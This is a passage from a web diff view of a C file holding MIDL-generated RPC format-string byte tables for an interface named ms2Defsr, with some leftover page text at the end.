0x06, 0x00, 0x0b, 0x01, 0x08, 0x00, 0x0c, 0x00, 0x48, 0x00, 0x0c, 0x00, 0x08, 0x00, 0x70, 0x00, 0x10, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x04, 0x00, 0x30, 0xe0,
|
||||
0x00, 0x00, 0x00, 0x00, 0x38, 0x00, 0x38, 0x00, 0x40, 0x01, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x12, 0x00, 0x00,
|
||||
}};
|
||||
static const ms2Defsr_MIDL_TYPE_FORMAT_STRING ms2Defsr__MIDL_TypeFormatString = {0, {
|
||||
0x00, 0x00, 0x11, 0x04, 0x02, 0x00, 0x30, 0xa0, 0x00, 0x00, 0x11, 0x08, 0x25, 0x5c, 0x11, 0x04, 0x02, 0x00, 0x30, 0xe1, 0x00, 0x00, 0x00,
|
||||
}};
|
||||
#endif
|
||||
0x06, 0x00, 0x0b, 0x01, 0x08, 0x00, 0x0c, 0x00, 0x48, 0x00, 0x0c, 0x00, 0x08, 0x00, 0x70, 0x00, 0x10, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x0c, 0x00, 0x30, 0x40,
|
||||
0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x08, 0x00, 0x4c, 0x03, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x14, 0x41, 0x04, 0x00, 0x18, 0x00, 0x70, 0x00,
|
||||
0x08, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x0c, 0x00, 0x30, 0x40, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x08, 0x00, 0x4c, 0x03, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x0c, 0x01, 0x04, 0x00, 0x26, 0x00, 0x70, 0x00, 0x08, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x04, 0x00, 0x30, 0xe0,
|
||||
0x00, 0x00, 0x00, 0x00, 0x38, 0x00, 0x38, 0x00, 0x40, 0x01, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x32, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
|
||||
0x0c, 0x00, 0x32, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x46, 0x02, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x01, 0x04, 0x00, 0x0c, 0x00, 0x70, 0x00, 0x08, 0x00, 0x08, 0x00,
|
||||
0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x10, 0x00, 0x32, 0x00, 0x00, 0x00, 0x08, 0x00, 0x08, 0x00, 0x46, 0x03, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x01, 0x04, 0x00,
|
||||
0x0c, 0x00, 0x48, 0x00, 0x08, 0x00, 0x08, 0x00, 0x70, 0x00, 0x0c, 0x00, 0x08, 0x00, 0x00,
|
||||
};
|
||||
#endif
|
||||
const UCHAR ms2Defsr__MIDL_TypeFormatString[] = {
|
||||
0x00, 0x00, 0x11, 0x04, 0x02, 0x00, 0x30, 0xa0, 0x00, 0x00, 0x11, 0x08, 0x25, 0x5c, 0x30, 0x41, 0x00, 0x00, 0x11, 0x04, 0x04, 0x00, 0x02, 0x5c, 0xb5, 0x00, 0xfc, 0xff, 0x01, 0x00, 0x01, 0x00,
|
||||
0x11, 0x00, 0x04, 0x00, 0x02, 0x5c, 0xb5, 0x00, 0xfc, 0xff, 0x01, 0x00, 0x01, 0x00, 0x11, 0x04, 0x02, 0x00, 0x30, 0xe1, 0x00, 0x00, 0x00,
|
||||
};
|
Loading…
Reference in New Issue
Block a user